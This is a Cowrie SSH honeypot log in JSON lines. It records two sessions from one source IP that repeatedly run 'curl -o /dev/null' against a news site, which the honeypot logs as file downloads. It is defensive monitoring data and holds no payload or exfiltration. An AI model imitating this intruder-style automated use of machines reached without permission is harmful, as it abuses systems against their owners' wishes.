{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.866997Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.876404Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.877204Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.884060Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.885382Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.909989Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.911627Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.923626Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.924541Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.929559Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.932152Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.932881Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.944548Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.948941Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.966825Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.968017Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.971718Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.974817Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.976583Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.977402Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.995423Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.006267Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.013384Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.014286Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.023475Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.024424Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.051808Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.052817Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.060729Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.061709Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.066625Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.075433Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.088784Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.090971Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.092643Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.093560Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.101164Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.104835Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.105658Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.125163Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.131998Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.132917Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.139055Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.140302Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.143602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.144225Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.169045Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.170034Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.180955Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.182530Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.212130Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.213263Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.226383Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.227993Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.251929Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.252877Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.264973Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.266411Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.290171Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.291098Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.303953Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.304907Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.325904Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.326855Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.347804Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.349210Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.379872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.381076Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.392314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.393369Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.416655Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.417638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.430761Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.431871Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.452081Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.453095Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.471754Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.472713Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.491543Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.492675Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.494001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.511956Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.513010Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.527313Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.531610Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.532409Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.556440Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.557371Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.568476Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.569873Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.583786Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.598864Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.599841Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:34.607774Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:34.608578Z","src_ip":"212.227.125.160","session":"7541ed730449"}
